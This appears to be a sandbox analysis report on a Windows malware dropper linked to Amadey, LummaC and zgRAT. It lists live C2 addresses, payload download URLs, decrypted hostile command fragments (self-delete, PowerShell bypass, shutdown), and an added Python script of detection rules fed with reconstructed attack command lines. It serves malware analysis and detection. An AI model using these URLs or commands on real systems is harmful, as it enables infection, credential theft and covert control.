Windows Analysis Report
SUAosT64HD.exe

Overview

General Information

Sample name: SUAosT64HD.exe
Renamed because the original name is a hash value.
Original sample name: a9f93ec56cea5f5cc39a2462979aaedcc3c0ea49d2cdf211c6aff8bd3c668a79N.exe
Analysis ID: 1651333
MD5: 9a84a7b5cc944be439829ad200cd4bc0
SHA1: 4bef117ca6328405d457ace1a6f14a59e7d4758e
SHA256: a9f93ec56cea5f5cc39a2462979aaedcc3c0ea49d2cdf211c6aff8bd3c668a79

Detection

Amadey, Babadeda, LummaC Stealer, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected Babadeda
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected zgRAT
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to start a terminal service
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Sample is not signed and drops a device driver
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious New Service Creation
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Uses cmd line tools excessively to alter registry or file data
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Suspicious Recursive Takeown
Suricata IDS alerts with low severity for network traffic
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

Classification chart (only the labels of the rendered graphic survive): Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious
Name | Description | Attribution | Blogpost URLs | Link
Amadey | Amadey is a botnet that appeared around October 2018 and is sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls it for orders. Its main functionality is loading other payloads (called "tasks") onto all, or specifically targeted, computers compromised by the malware. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Babadeda | According to PCrisk, Babadeda is a new member of the crypter family, allowing threat actors to encrypt and obfuscate their malicious samples. The obfuscation lets the malware bypass the majority of antivirus products without triggering any alerts. According to the researchers' analysis, Babadeda uses sophisticated, complex obfuscation that yields a very low detection rate among anti-virus engines. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda
zgRAT | zgRAT is a Remote Access Trojan that sometimes drops other malware such as AgentTesla. zgRAT also has an infostealer component that targets browser data and cryptocurrency wallets. It usually spreads via USB drives or phishing emails with .zip, .lnk, .bat or .xlsx attachments. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

AV Detection

Source: SUAosT64HD.exe Avira: detected
Source: weldorae.digital/geds Avira URL Cloud: Label: malware
Source: oreheatq.live/gsopp Avira URL Cloud: Label: malware
Source: steelixr.live/aguiz Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/martin1/martin.zip Avira URL Cloud: Label: phishing
Source: smeltingt.run/giiaus Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.php#w Avira URL Cloud: Label: malware
Source: castmaxw.run/ganzde Avira URL Cloud: Label: malware
Source: galarona.bet/GKAns Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/newdef/apple.exe Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/5876083921/Or1ARiR.exe Avira URL Cloud: Label: phishing
Source: http://176.113.115.7/files/7001656225/Rm3cVPI.exe Avira URL Cloud: Label: phishing
Source: ferromny.digital/gwpd Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe Avira: detection malicious, Label: HEUR/AGEN.1361736
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Or1ARiR[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Rm3cVPI[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\xZRvIQ5[1].exe Avira: detection malicious, Label: HEUR/AGEN.1361736
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\10359310101\Or1ARiR.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\ssisd.sys Avira: detection malicious, Label: HEUR/AGEN.1350862
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: 29.0.Rm3cVPI.exe.980000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["galarona.bet/GKAns", "oreheatq.live/gsopp", "castmaxw.run/ganzde", "weldorae.digital/geds", "steelixr.live/aguiz", "advennture.top/GKsiio", "targett.top/dsANGt", "smeltingt.run/giiaus", "ferromny.digital/gwpd"], "Build id": "d250578b335fbbce73b510aa5accebc066be54418f8bcf75cd"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\39pazbF[1].exe ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\apple[1].exe ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\xZRvIQ5[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Rm3cVPI[1].exe ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe ReversingLabs: Detection: 72%
Source: C:\Users\user\AppData\Local\Temp\10358510101\39pazbF.exe ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\10359660101\xZRvIQ5.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\22.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\ssisd.sys ReversingLabs: Detection: 62%
Source: SUAosT64HD.exe ReversingLabs: Detection: 73%
Source: SUAosT64HD.exe Virustotal: Detection: 77%
Source: Submitted Sample Neural Call Log Analysis: 99.5%
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: 185.215.113.16
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: /Jo89Ku7d/index.php
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: S-%lu-
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: 44111dbc49
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: axplong.exe
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: Startup
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: cmd /C RMDIR /s/q
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: rundll32
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: Programs
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: %USERPROFILE%
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: cred.dll|clip.dll|
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: cred.dll
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: clip.dll
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: http://
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: https://
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: /quiet
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: /Plugins/
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: &unit=
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: shell32.dll
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: kernel32.dll
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: GetNativeSystemInfo
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: ProgramData\
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: AVAST Software
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: Kaspersky Lab
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: Panda Security
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: Doctor Web
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: 360TotalSecurity
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: Bitdefender
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: Norton
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: Sophos
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: Comodo
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: WinDefender
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: 0123456789
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: ------
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: ?scr=1
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: ComputerName
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: -unicode-
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: VideoID
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: DefaultSettings.XResolution
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: DefaultSettings.YResolution
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: ProductName
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: CurrentBuild
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: rundll32.exe
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: "taskkill /f /im "
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: " && timeout 1 && del
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: && Exit"
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: " && ren
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: Powershell.exe
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: -executionpolicy remotesigned -File "
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: shutdown -s -t 0
Source: 00000001.00000003.1323941232.0000000005300000.00000004.00001000.00020000.00000000.sdmp String decryptor: random
Source: 29.0.Rm3cVPI.exe.980000.0.unpack String decryptor: galarona.bet/GKAns
Source: 29.0.Rm3cVPI.exe.980000.0.unpack String decryptor: oreheatq.live/gsopp
Source: 29.0.Rm3cVPI.exe.980000.0.unpack String decryptor: castmaxw.run/ganzde
Source: 29.0.Rm3cVPI.exe.980000.0.unpack String decryptor: weldorae.digital/geds
Source: 29.0.Rm3cVPI.exe.980000.0.unpack String decryptor: steelixr.live/aguiz
Source: 29.0.Rm3cVPI.exe.980000.0.unpack String decryptor: advennture.top/GKsiio
Source: 29.0.Rm3cVPI.exe.980000.0.unpack String decryptor: targett.top/dsANGt
Source: 29.0.Rm3cVPI.exe.980000.0.unpack String decryptor: smeltingt.run/giiaus
Source: 29.0.Rm3cVPI.exe.980000.0.unpack String decryptor: ferromny.digital/gwpd
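The decrypted strings above (the "taskkill /f /im" / "timeout 1 && del" / "&& Exit" fragments, "cmd /C RMDIR /s/q", "Powershell.exe -executionpolicy remotesigned -File", "rundll32" with "cred.dll|clip.dll", and the install folder "44111dbc49" with "axplong.exe") are the raw material for host detections. The script below is an added example for this page, not part of the Joe Sandbox report and not Amadey code: it turns those strings into process-creation rules and runs them over constructed telemetry. Three things in it are assumptions rather than report facts: how the string fragments are joined into a full command line at runtime, the generalisation of the two observed install folder names (44111dbc49, bb556cff4a) to "ten hex characters under %LOCALAPPDATA%\Temp", and the sample events themselves.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Indicators lifted from the Amadey configuration and decrypted strings in the
# report. Both install folders observed there ("44111dbc49" for axplong.exe,
# "bb556cff4a" for rapes.exe) are ten lowercase hex characters; the regex
# generalises that observation, which is an assumption of this example.
AMADEY_INSTALL_FILE = "axplong.exe"
TEMP_HEX_DIR_EXE = re.compile(
    r"\\AppData\\Local\\Temp\\[0-9a-f]{10}\\[^\\]+?\.exe", re.IGNORECASE
)

# The command-line shapes below are an assumed reconstruction of how the
# decrypted fragments are concatenated at runtime; the patterns are
# deliberately loose about quoting and spacing so minor variants still match.
RULES = [
    ("amadey_self_delete_chain",
     re.compile(r"taskkill\s+/f\s+/im\s+\S+.*&&\s*timeout\s+\d+\s*&&\s*del\b", re.I)),
    ("amadey_rmdir_install_dir",
     re.compile(r"\bRMDIR\s+/s\s*/q\b.*\\AppData\\Local\\Temp\\[0-9a-f]{10}", re.I)),
    ("amadey_powershell_task",
     re.compile(r"powershell(?:\.exe)?\s+-executionpolicy\s+remotesigned\s+-File\b", re.I)),
    ("amadey_plugin_via_rundll32",
     re.compile(r"rundll32(?:\.exe)?\s+.*\\(?:cred|clip)\.dll\b", re.I)),
    ("amadey_temp_hex_dir_exec", TEMP_HEX_DIR_EXE),
]


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (Sysmon event 1 / EDR telemetry shape)."""
    pid: int
    image: str
    command_line: str


def match_rules(event: ProcessEvent) -> list[str]:
    """Return the names of every rule the event trips, in RULES order."""
    hits = [name for name, rx in RULES if rx.search(event.command_line)]
    # Strongest signal: the configured install file running from a hex-named
    # Temp folder, i.e. the persistence copy itself.
    if (event.image.lower().endswith("\\" + AMADEY_INSTALL_FILE)
            and TEMP_HEX_DIR_EXE.search(event.image)):
        hits.append("amadey_install_file")
    return hits


def triage(events: list[ProcessEvent]) -> dict[int, list[str]]:
    """Map pid -> rule hits for every event that matches at least one rule."""
    return {e.pid: hits for e in events if (hits := match_rules(e))}


# Constructed sample telemetry. The paths reuse names from the report
# (SUAosT64HD.exe, 44111dbc49\axplong.exe, bb556cff4a, 10359660101); the
# command lines themselves are made up for this example.
SAMPLE_EVENTS = [
    ProcessEvent(1001, r"C:\Users\user\Desktop\SUAosT64HD.exe",
                 r'"C:\Users\user\Desktop\SUAosT64HD.exe"'),
    ProcessEvent(1002, r"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe",
                 r'"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"'),
    ProcessEvent(1003, r"C:\Windows\System32\cmd.exe",
                 r'cmd /C "taskkill /f /im SUAosT64HD.exe && timeout 1 && del '
                 r'"C:\Users\user\Desktop\SUAosT64HD.exe" && Exit"'),
    ProcessEvent(1004, r"C:\Windows\System32\rundll32.exe",
                 r'rundll32.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\cred.dll",Main'),
    ProcessEvent(1005, r"C:\Windows\System32\cmd.exe",
                 r'cmd /C RMDIR /s/q "C:\Users\user\AppData\Local\Temp\bb556cff4a"'),
    ProcessEvent(1006, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'Powershell.exe -executionpolicy remotesigned -File '
                 r'"C:\Users\user\AppData\Local\Temp\10359660101\task.ps1"'),
    # Benign look-alikes: an installer unpacked to a non-hex Temp folder and a
    # normal service host. Neither should fire.
    ProcessEvent(1007, r"C:\Users\user\AppData\Local\Temp\7zS4F2A.tmp\setup.exe",
                 r'"C:\Users\user\AppData\Local\Temp\7zS4F2A.tmp\setup.exe" /S'),
    ProcessEvent(1008, r"C:\Windows\System32\svchost.exe", r"svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(hits))
```

The self-delete chain and the RMDIR rule are the cheapest to deploy and the hardest for the operator to change without touching the loader, because they come from the loader's own string table rather than from a packer layer; the hex-folder rule is the one to tune, since legitimate installers also execute from Temp (event 1007 shows why the folder name, not just the Temp location, is the discriminator).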

Compliance

Source: C:\Users\user\AppData\Local\Temp\22.exe Unpacked PE file: 16.2.22.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\22.exe Unpacked PE file: 19.2.22.exe.400000.0.unpack
Source: SUAosT64HD.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: apple.exe, 0000000E.00000003.1923045915.00000000068E1000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000000E.00000003.1922478872.00000000060EE000.00000004.00000020.00020000.00000000.sdmp, apple.exe, 0000000E.00000002.1929624688.00000000008F3000.00000002.00000001.01000000.0000000C.sdmp, apple.exe, 0000000E.00000000.1920430499.00000000008F3000.00000002.00000001.01000000.0000000C.sdmp, apple.exe.11.dr, apple[1].exe.11.dr, 39pazbF[1].exe.11.dr
Source: Binary string: C:\Users\1231123\Desktop\DDriver\x64\Release\DDriver.pdb source: ssisd.sys.14.dr
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe File opened: C:\Users\user\Desktop\desktop.ini

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49717 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49719 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.5:49717
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49721
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49728
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49751
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49759
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49795
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 176.113.115.6:80 -> 192.168.2.5:49780
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49802
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49745
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49746
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49720
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49747
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49786
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49779
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49809
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49768
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49773
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49783
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49749
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49792
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49734
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49741
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49754
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49724
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49775
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49750
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49729
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49800
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49787
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49722
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49804
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49807
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49731
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49814
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49730
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49742
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49798
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49727
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49758
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49769
Source: Network traffic Suricata IDS: 2060969 - Severity 1 - ET MALWARE Amadey CnC Response : 185.215.113.16:80 -> 192.168.2.5:49752
